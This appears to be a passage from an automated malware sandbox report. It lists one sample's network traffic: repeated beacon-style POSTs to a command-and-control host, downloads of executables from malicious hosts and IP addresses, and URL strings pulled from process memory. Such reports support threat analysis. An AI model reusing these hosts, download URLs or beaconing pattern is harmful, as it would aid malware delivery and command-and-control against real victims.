                          Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tgajiadc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xvuvc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tdosgx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://npqwstsduq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 217Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ouyysee.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rtqpowrk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hhpljg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ipycpcfbe.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sdstpsloir.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tfxyjpgh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ycdbyxqt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gcfxlgitg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 168Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://afdvsashlg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kapjpsnnjq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kcsjausffk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://djmmsjo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ipjoaoftf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sdkmuxkbh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vomuxg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fjenisnthl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 288Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pixmwg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mwbuboe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pylkam.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 179Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fdhqx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 360Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pslqekdvh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 132Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ecicwppql.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/8474_1641976243_3082.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tlwsaw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://krrkfa.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gfydmobm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 290Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uhdak.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 283Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://assuf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rblisqqaii.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xnvwvqck.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vltihla.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qnqlcbx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 337Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://flqhri.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://poqgfb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oycnsawak.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /6236.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 81.163.30.181
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ylanbcfwv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 267Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yxorycdxma.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 209Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tcqdnx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: host-data-coin-11.com
                          Source: global trafficTCP traffic: 192.168.2.4:49806 -> 185.7.214.171:8080
                          Source: global trafficTCP traffic: 192.168.2.4:49901 -> 86.107.197.138:38133
                          Source: unknownNetwork traffic detected: IP country count 10
                          Source: global trafficTCP traffic: 192.168.2.4:49849 -> 104.47.54.36:25
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/chat/video/videocalldownload.php
                          Source: FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
                          Source: WerFault.exe, 00000011.00000003.800022115.0000000004FB9000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000002.805338567.0000000004FB9000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.819415155.000001A7842EC000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                          Source: FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://forms.rea
                          Source: FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                          Source: FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://go.micros
                          Source: svchost.exe, 00000016.00000003.792006375.000001A784B93000.00000004.00000001.sdmpString found in binary or memory: http://help.disneyplus.com.
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                          Source: FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                          Source: FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
